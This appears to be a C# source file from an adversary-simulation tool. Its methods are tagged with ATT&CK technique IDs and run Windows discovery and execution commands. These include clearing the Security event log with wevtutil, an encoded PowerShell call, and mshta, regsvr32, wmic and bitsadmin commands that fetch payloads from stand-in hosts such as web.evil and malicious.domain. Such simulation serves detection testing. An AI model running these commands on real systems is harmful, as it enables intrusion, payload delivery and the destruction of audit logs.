static public void WindowsCommandShell(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1059.003"); try { ExecutionHelper.StartProcessApi("", "cmd.exe /C whoami", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void SystemNetworkConfigurationDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1016"); try { ExecutionHelper.StartProcess("", "ipconfig /all", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void FileAndDirectoryDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1083"); try { ExecutionHelper.StartProcess("", @"dir c:\ >> %temp%\download", logger); ExecutionHelper.StartProcess("", @"dir C:\Users\ >> %temp%\download", logger, true); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Rundll32(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.011"); try { string file = @"C:\Windows\twain_64.dll"; ExecutionHelper.StartProcess("", String.Format("rundll32 \"{0}\"", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void ClearSecurityEventLogCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1070.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void InstallUtil(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.004"); try { string file = @"C:\Windows\Temp\XKNqbpzl.exe"; ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfiles /LogToConsole=alse /U {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemUserDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1033"); try { ExecutionHelper.StartProcess("", "whoami", logger); ExecutionHelper.StartProcess("", "query user", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Mshta(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.005"); try { string url = "http://webserver/payload.hta"; ExecutionHelper.StartProcess("", String.Format("mshta {0}", url), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void NetworkShareEnumerationCmdLocal(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1135"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcessApi("", "net share", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ExecutePowershell(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1086"); try { string encodedPwd = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA=="; ExecutionHelper.StartProcess("", String.Format("powershell.exe -enc {0}", encodedPwd), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ExecuteWmiCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1047"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcessNET("wmic.exe", String.Format(@"process call create ""powershell.exe"""), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void XlScriptProcessing(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1220"); try { string url = "http://webserver/payload.xsl"; ExecutionHelper.StartProcess("", String.Format("wmic os get /FORMAT:\"{0}\"", url), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void Csmtp(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.003"); try { string file = @"C:\Users\Administrator\AppData\Local\Temp\XKNqbpzl.txt"; ExecutionHelper.StartProcess("", String.Format("cmstp /s /ns {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemServiceDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1007"); try { ExecutionHelper.StartProcess("", "net start", logger); ExecutionHelper.StartProcess("", "tasklist /svc", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ServiceExecution(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1569.002"); try { ExecutionHelper.StartProcessApi("", "net start UpdaterService", logger); ExecutionHelper.StartProcessApi("", "sc start UpdaterService", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void RemoteSystemDiscoveryCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1018"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcessNET("cmd.exe", "/c net view", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void ExecutePowershellCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1059.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { string encodedPwd = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA=="; ExecutionHelper.StartProcessApi("", String.Format("powershell.exe -enc {0}", encodedPwd), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void ClearSecurityEventLogCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1070"); //logger.TimestampInfo(String.Format("Starting T1070 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { ExecutionHelper.StartProcess("", "wevtutil.exe cl Security", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemNetworkConnectionsDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1049"); try { ExecutionHelper.StartProcess("", "netstat", logger); ExecutionHelper.StartProcess("", "net use", logger); ExecutionHelper.StartProcess("", "net session", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void DeobfuscateDecode(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1140"); try { string encoded = "encodedb64.txt"; string decoded = "decoded.exe"; ExecutionHelper.StartProcess("", String.Format("certutil -decode {0} {1}", encoded, decoded), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void DomainAccountDiscoveryCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1087.002"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "net user /domain", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void BitsJobs(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1197"); try { string url = "http://web.evil/sc.exe"; string file = @"C:\Windows\Temp\winword.exe"; ExecutionHelper.StartProcess("", String.Format("bitsadmin /transfer job /download /priority high {0} {1}", url, file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void JScript(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1059.007"); try { string file = "invoice0420.js"; ExecutionHelper.StartProcessApi("", String.Format("wscript.exe {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
static public void Regsvr32(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.010"); try { string url = @"http://malicious.domain:8080/payload.sct"; string dll = "scrobj.dll"; ExecutionHelper.StartProcess("", String.Format("regsvr32.exe /u /n /s /i:{0} {1}", url, dll), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void RegsvcsRegasm(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1218.009"); try { string file = @"winword.dll"; ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U {0}", file), logger); ExecutionHelper.StartProcess("", String.Format(@"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U {0}", file), logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void DomainTrustDiscoveryCmd(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Logger logger = new Logger(currentPath + log); logger.SimulationHeader("T1482"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcessNET("nltest.exe", "/domain_trusts", logger); //ExecutionHelper.StartProcessApi("","nltest /domain_trusts", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void PasswordPolicyDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1201"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcessApi("", "net accounts", logger); ExecutionHelper.StartProcessApi("", "net accounts /domain", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemUserDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1033"); //logger.TimestampInfo(String.Format("Starting T1033 Simulation on {0}", Environment.MachineName)); //logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id)); try { ExecutionHelper.StartProcess("", "whoami", logger); ExecutionHelper.StartProcess("", "query user", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void LocalGroups(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1069.001"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "net localgroup", logger); ExecutionHelper.StartProcess("", "net localgroup \"Administrators\"", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }
public static void SystemTimeDiscovery(string log) { string currentPath = AppDomain.CurrentDomain.BaseDirectory; Lib.Logger logger = new Lib.Logger(currentPath + log); logger.SimulationHeader("T1124"); logger.TimestampInfo("Using the command line to execute the technique"); try { ExecutionHelper.StartProcess("", "w32tm /tz", logger); ExecutionHelper.StartProcess("", "time /T", logger); logger.SimulationFinished(); } catch (Exception ex) { logger.SimulationFailed(ex); } }